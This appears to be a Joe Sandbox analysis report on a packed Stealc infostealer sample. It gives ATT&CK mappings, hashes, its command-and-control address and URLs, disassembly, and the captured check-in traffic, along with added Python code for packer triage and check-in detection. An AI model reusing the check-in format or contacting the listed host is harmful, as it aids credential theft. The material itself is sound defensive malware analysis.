Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (13); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Create Account (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus results for the sample

Source | Detection | Scanner | Label
file.exe | 51% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus results for URLs

Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpy~C4 | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php47 | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpp7 | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpez | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpp7 | 18% | Virustotal |
No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high

URLs from process memory

The variants below with trailing characters after .php (p7, z, /, y~C4, ez, 47) and the "185.215.113.2065" entry appear to be the same C2 URL followed by adjacent bytes in the memory dump; the path actually requested is http://185.215.113.206/c4becf79229cb002.php, which matches the contacted-URL entry above and the Suricata alert further down.

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.phpp7 | file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmp | false | 18% Virustotal; Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpz | file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpy~C4 | file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/ws | file.exe, 00000000.00000002.1716207781.0000000001646000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.2065 | file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpez | file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php47 | file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572096
Start date and time: 2024-12-10 05:46:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 15
• Number of non-executed functions: 128
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
                            No simulations
IP context (match: 185.215.113.206)

Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                            No context
ASN context (match: WHOLESALECONNECTIONSNL)

Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey | 185.215.113.43
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 185.215.113.206
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 185.215.113.206
                            No context
                            No context
                            No created / dropped files found
Static File Info

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.949004805785211
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'772'032 bytes
MD5: c1950c4aafa568b63462b2131c67ceab
SHA1: e2aefdf02e7081c1b6bd03affd8d336642388854
SHA256: 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb
SHA512: 24312a48d39d7142ea6b8d49f0c0a95a8661588697e3ec6fd45df5046c83df764549a4f46d0dd732676cbc92468a9c887a75c8681f9c1a9b29fface67df044a9
SSDEEP: 24576:4M65D66hgGJglzXMwGyAvtUybnqeFC3pDdtmnRt+LDu0QRJmlVJYS2smPl4XwQ89:4f5FhgOgPpWTb1CF7mzKlgpS1AG7Q
TLSH: 48853333FB669FBEE0612DF5E9202571F6EE52B49D5637ACA360184B3002763DA79C40
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L....dTg...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xa7e000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67546419 [Sat Dec 7 15:04:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint preview (Instruction)
                            jmp 00007F3BACB3623Ah
                            psubsb mm3, qword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            inc ecx
                            push bx
                            dec esi
                            dec ebp
                            das
                            xor al, 36h
                            dec edi
                            bound ecx, dword ptr [ecx+4Ah]
                            dec edx
                            insd
                            push edi
                            dec eax
                            dec eax
                            jbe 00007F3BACB362A2h
                            push esi
                            dec edx
                            popad
                            je 00007F3BACB3629Bh
                            push edx
                            dec esi
                            jc 00007F3BACB362AAh
                            cmp byte ptr [ebx], dh
                            push edx
                            jns 00007F3BACB36277h
                            or eax, 49674B0Ah
                            cmp byte ptr [edi+43h], dl
                            jnc 00007F3BACB3627Dh
                            bound eax, dword ptr [ecx+30h]
                            pop edx
                            inc edi
                            push esp
                            push 43473163h
                            aaa
                            push edi
                            dec esi
                            xor ebp, dword ptr [ebx+59h]
                            push edi
                            push edx
                            pop eax
                            je 00007F3BACB36287h
                            xor dl, byte ptr [ebx+2Bh]
                            popad
                            jne 00007F3BACB3627Ch
                            dec eax
                            dec ebp
                            jo 00007F3BACB36273h
                            xor dword ptr [edi], esi
                            inc esp
                            dec edx
                            dec ebp
                            jns 00007F3BACB36280h
                            insd
                            jnc 00007F3BACB362A0h
                            aaa
                            inc esp
                            inc ecx
                            inc ebx
                            xor dl, byte ptr [ecx+4Bh]
                            inc edx
                            inc esp
                            bound esi, dword ptr [ebx]
                            or eax, 63656B0Ah
                            jno 00007F3BACB36288h
                            push edx
                            insb
                            js 00007F3BACB362A1h
                            outsb
                            inc ecx
                            jno 00007F3BACB36282h
                            push ebp
                            inc esi
                            pop edx
                            xor eax, dword ptr [ebx+36h]
                            push eax
                            aaa
                            imul edx, dword ptr [ebx+58h], 4Eh
                            aaa
                            inc ebx
                            jbe 00007F3BACB3627Ch
                            dec ebx
                            js 00007F3BACB36273h
                            jne 00007F3BACB36261h
                            push esp
                            inc bp
                            outsb
                            inc edx
                            popad
                            dec ebx
                            insd
                            dec ebp
                            inc edi
                            xor dword ptr [ecx+36h], esp
                            push 0000004Bh
                            sub eax, dword ptr [ebp+33h]
                            jp 00007F3BACB3628Ch
                            dec edx
                            xor bh, byte ptr [edx+56h]
                            bound eax, dword ptr [edi+66h]
                            jbe 00007F3BACB3626Ah
                            dec eax
                            or eax, 506C720Ah
                            aaa
                            xor dword ptr fs:[ebp+62h], ecx
                            arpl word ptr [esi], si
                            inc esp
                            jo 00007F3BACB362A3h
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16800 | 73f80b079d1e788654779108d827004e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x1ac | 0x200 | e2d5d0d7d0d985448b9b06b65b10b0a8 | False | 0.583984375 | data | 4.552278876714865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x29a000 | 0x200 | c17f752a2760b6c07fd81243dacdd662 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yyknqjng | 0x4e6000 | 0x197000 | 0x196600 | fb6d4d4819bc9959535137b86d5cc4d6 | False | 0.9947840568286681 | data | 7.953203836513533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ncuennkv | 0x67d000 | 0x1000 | 0x400 | 9299835f9c277271f9ab627ee8495329 | False | 0.7783203125 | data | 6.0243597828577 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x67e000 | 0x3000 | 0x2200 | b309e8d49b4bea93bfe9db7673f0b8f5 | False | 0.3957950367647059 | DOS executable (COM) | 4.152161401856862 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Name         RVA       Size   Type                                    Language  Country  ZLIB Complexity
                            RT_MANIFEST  0x67c2d8  0x152  ASCII text, with CRLF line terminators                     0.6479289940828402
                            DLL           Import
                            kernel32.dll  lstrcpy
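The section table above is the static picture of a packed binary: five sections mapped readable, writable and executable at once, two of them with no printable name, one (yyknqjng) at entropy 7.95, and an import table that names a single function. The following is an added example, not Joe Sandbox code: it rebuilds the report's section headers as real IMAGE_SECTION_HEADER bytes, parses them back, and runs the triage checks a packer-aware analyst applies first. The (name, size, characteristics) values are copied from the table; section contents are not on the page, so the entropy column is taken from the report where given and the entropy routine is only exercised on constructed data. The 8x raw-size ratio and the 7.5 entropy threshold are this example's own choices.

```python
"""Section-header triage for a packed PE, using the section layout reported above.

Added example, not Joe Sandbox code. The (name, sizes, characteristics)
tuples are copied from the report's section table; the header bytes are
rebuilt from them with struct so the parser has real IMAGE_SECTION_HEADER
input to work on. Raw section contents are not on the page, so entropy is
taken from the report where given and only demonstrated on constructed data.
"""
import math
import struct
from collections import Counter

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
INIT_RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | RWX
INIT_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# (name, VirtualSize, VirtualAddress, SizeOfRawData, Characteristics), from the report.
# Two sections have no printable name in the report; they are given "" here.
REPORT_SECTIONS = [
    ("",         0x249000, 0x1000,   0x16800,  INIT_RWX),
    (".rsrc",    0x1ac,    0x24a000, 0x200,    INIT_RW),
    (".idata",   0x1000,   0x24b000, 0x200,    INIT_RW),
    ("",         0x29a000, 0x24c000, 0x200,    INIT_RWX),
    ("yyknqjng", 0x197000, 0x4e6000, 0x196600, INIT_RWX),
    ("ncuennkv", 0x1000,   0x67d000, 0x400,    INIT_RWX),
    (".taggant", 0x3000,   0x67e000, 0x2200,   INIT_RWX),
]
# Entropy column from the report; None where the report says "unknown".
REPORT_ENTROPY = [None, 4.552278876714865, 0.8646718654202081, None,
                  7.953203836513533, 6.0243597828577, 4.152161401856862]

# IMAGE_SECTION_HEADER: 8-byte name, 6 DWORDs, 2 WORDs, Characteristics DWORD (40 bytes).
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".tls", ".bss", ".CRT"}

def build_section_headers(sections):
    """Serialize section tuples into consecutive IMAGE_SECTION_HEADER records."""
    out, raw_ptr = bytearray(), 0x400
    for name, vsize, va, rawsize, chars in sections:
        out += SECTION_HDR.pack(name.encode().ljust(8, b"\0"), vsize, va, rawsize,
                                raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += rawsize
    return bytes(out)

def parse_section_headers(blob, count):
    """Parse `count` section headers; returns dicts a triage routine can work with."""
    secs = []
    for i in range(count):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = \
            SECTION_HDR.unpack_from(blob, i * SECTION_HDR.size)
        secs.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize,
                     "va": va, "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return secs

def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, up to 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def triage(secs, entropies):
    """Return (section name, reason) findings typical of a packed or protected PE."""
    findings = []
    for s, ent in zip(secs, entropies):
        name = s["name"]
        if s["chars"] & RWX == RWX:
            findings.append((name, "RWX section"))
        if name not in STANDARD_NAMES:
            findings.append((name, "non-standard or empty section name"))
        if s["rawsize"] and s["vsize"] > 8 * s["rawsize"]:
            findings.append((name, "virtual size far exceeds raw size (filled at runtime)"))
        if ent is not None and ent > 7.5:
            findings.append((name, "high entropy (compressed or encrypted payload)"))
    return findings

def triage_report():
    """Round-trip the report's sections through the parser and triage them."""
    blob = build_section_headers(REPORT_SECTIONS)
    return triage(parse_section_headers(blob, len(REPORT_SECTIONS)), REPORT_ENTROPY)

if __name__ == "__main__":
    for name, reason in triage_report():
        print(f"{name or '<unnamed>':10} {reason}")
```

On this layout the triage raises thirteen findings: five RWX sections, five non-standard names (the two empty ones, yyknqjng, ncuennkv and .taggant), two sections whose virtual size dwarfs their raw size (the unnamed ones at 0x1000 and 0x24c000, which are filled when the stub unpacks) and the high-entropy yyknqjng section that carries the packed payload.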
                            Timestamp                        SID      Signature                                         Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
                            2024-12-10T05:46:59.672495+0100  2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in   1         192.168.2.4  49730        185.215.113.206  80         TCP
                            Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                            Dec 10, 2024 05:46:57.775144100 CET  49730        80         192.168.2.4      185.215.113.206
                            Dec 10, 2024 05:46:57.894607067 CET  80           49730      185.215.113.206  192.168.2.4
                            Dec 10, 2024 05:46:57.894707918 CET  49730        80         192.168.2.4      185.215.113.206
                            Dec 10, 2024 05:46:57.895006895 CET  49730        80         192.168.2.4      185.215.113.206
                            Dec 10, 2024 05:46:58.014250994 CET  80           49730      185.215.113.206  192.168.2.4
                            Dec 10, 2024 05:46:59.226012945 CET  80           49730      185.215.113.206  192.168.2.4
                            Dec 10, 2024 05:46:59.226144075 CET  49730        80         192.168.2.4      185.215.113.206
                            Dec 10, 2024 05:46:59.231276035 CET  49730        80         192.168.2.4      185.215.113.206
                            Dec 10, 2024 05:46:59.350541115 CET  80           49730      185.215.113.206  192.168.2.4
                            Dec 10, 2024 05:46:59.672362089 CET  80           49730      185.215.113.206  192.168.2.4
                            Dec 10, 2024 05:46:59.672494888 CET  49730        80         192.168.2.4      185.215.113.206
                            Dec 10, 2024 05:47:01.195583105 CET  49730        80         192.168.2.4      185.215.113.206
                            • 185.215.113.206
                            Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                            0           192.168.2.4  49730        185.215.113.206  80                1136  C:\Users\user\Desktop\file.exe
                            Timestamp                            Bytes transferred  Direction  Data
                            Dec 10, 2024 05:46:57.895006895 CET  90                 OUT
                                GET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                            Dec 10, 2024 05:46:59.226012945 CET  203                IN
                                HTTP/1.1 200 OK
                                Date: Tue, 10 Dec 2024 04:46:59 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                            Dec 10, 2024 05:46:59.231276035 CET  412                OUT
                                POST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI
                                Host: 185.215.113.206
                                Content-Length: 210
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 37 35 42 31 38 34 33 37 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a
                                Data Ascii (CRLF line breaks restored from the raw bytes):
                                    ------JKKFIIEBKEGIEBFIJKFI
                                    Content-Disposition: form-data; name="hwid"

                                    3E75B184375B340779059
                                    ------JKKFIIEBKEGIEBFIJKFI
                                    Content-Disposition: form-data; name="build"

                                    stok
                                    ------JKKFIIEBKEGIEBFIJKFI--
                            Dec 10, 2024 05:46:59.672362089 CET  210                IN
                                HTTP/1.1 200 OK
                                Date: Tue, 10 Dec 2024 04:46:59 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=
                                (base64 for the string "block"; the HTTP data captured for this session ends with this reply)
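The exchange above is the whole of the sample's C2 traffic: a bare GET to the host, then a multipart POST carrying only a hardware ID and a build name, answered with eight bytes of base64. What follows is an added example, not Joe Sandbox or Stealc code. It decodes the captured request and reply from the report's own "Data Raw" bytes and turns the shape of that check-in into a detection heuristic. The heuristic (POST to a hex-named .php, a multipart boundary made only of the letters A-K, exactly the fields hwid and build) is derived from this single capture and is an assumption to be tuned against more samples before use; the benign upload at the end is constructed to show the detector staying quiet on ordinary multipart traffic.

```python
"""Decode the Stealc check-in exchange captured above and derive a detector from it.

Added example, not Joe Sandbox or Stealc code. The request body hex and the
response body are copied from the report's "Data Raw" lines; the detector's
heuristics are this example's own and are drawn only from this one capture.
"""
import base64
import re

# Copied from the report's POST /c4becf79229cb002.php "Data Raw" line (210 bytes).
REQUEST_BODY_HEX = (
    "2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 "
    "74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 37 35 42 31 38 34 33 "
    "37 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 "
    "4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 "
    "69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c "
    "64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 "
    "47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a"
)
RESPONSE_BODY = bytes.fromhex("59 6d 78 76 59 32 73 3d")   # "YmxvY2s=" from the report

# Request line and headers as captured; the body is the hex above decoded.
REQUEST = {
    "method": "POST",
    "path": "/c4becf79229cb002.php",
    "headers": {
        "Content-Type": "multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI",
        "Host": "185.215.113.206",
        "Content-Length": "210",
    },
    "body": bytes.fromhex(REQUEST_BODY_HEX),
}

def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser (RFC 2046 framing only): {field: value}."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb';\s*name="([^"]+)"', head)   # "; name=", not "; filename="
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n").decode()
    return fields

def decode_checkin(req: dict) -> dict:
    """Pull the form fields out of a captured check-in request."""
    m = re.search(r"boundary=([^;\s]+)", req["headers"]["Content-Type"])
    return parse_multipart(req["body"], m.group(1))

def decode_response(body: bytes) -> str:
    """The C2 answered with a base64 token; return it decoded."""
    return base64.b64decode(body, validate=True).decode()

def looks_like_stealc_checkin(req: dict) -> bool:
    """Heuristic drawn from this one capture (assumption, tune before deploying):
    POST to a hex-named .php, multipart boundary made only of letters A-K, and
    exactly the two fields hwid and build."""
    if req["method"] != "POST" or not re.fullmatch(r"/[0-9a-f]+\.php", req["path"]):
        return False
    ct = req["headers"].get("Content-Type", "")
    m = re.search(r"boundary=(-*[A-K]+)$", ct)
    if not m:
        return False
    return set(parse_multipart(req["body"], m.group(1))) == {"hwid", "build"}

# Constructed benign upload, to show the detector does not fire on ordinary multipart.
BENIGN_UPLOAD = {
    "method": "POST",
    "path": "/upload.php",
    "headers": {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"},
    "body": (b"------WebKitFormBoundary7MA4YWxk\r\n"
             b'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
             b"Content-Type: text/plain\r\n\r\nhello\r\n"
             b"------WebKitFormBoundary7MA4YWxk--\r\n"),
}

if __name__ == "__main__":
    print(decode_checkin(REQUEST))          # {'hwid': '3E75B184375B340779059', 'build': 'stok'}
    print(decode_response(RESPONSE_BODY))   # block
    print(looks_like_stealc_checkin(REQUEST), looks_like_stealc_checkin(BENIGN_UPLOAD))
```

The 210 bytes of body match the Content-Length header exactly, which is a quick sanity check that the hex on the page is complete. Note that the server's reply is a single decoded token, not a configuration or task list, and the session shows no further requests after it.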



                            Target ID:0
                            Start time:23:46:53
                            Start date:09/12/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x590000
                            File size:1'772'032 bytes
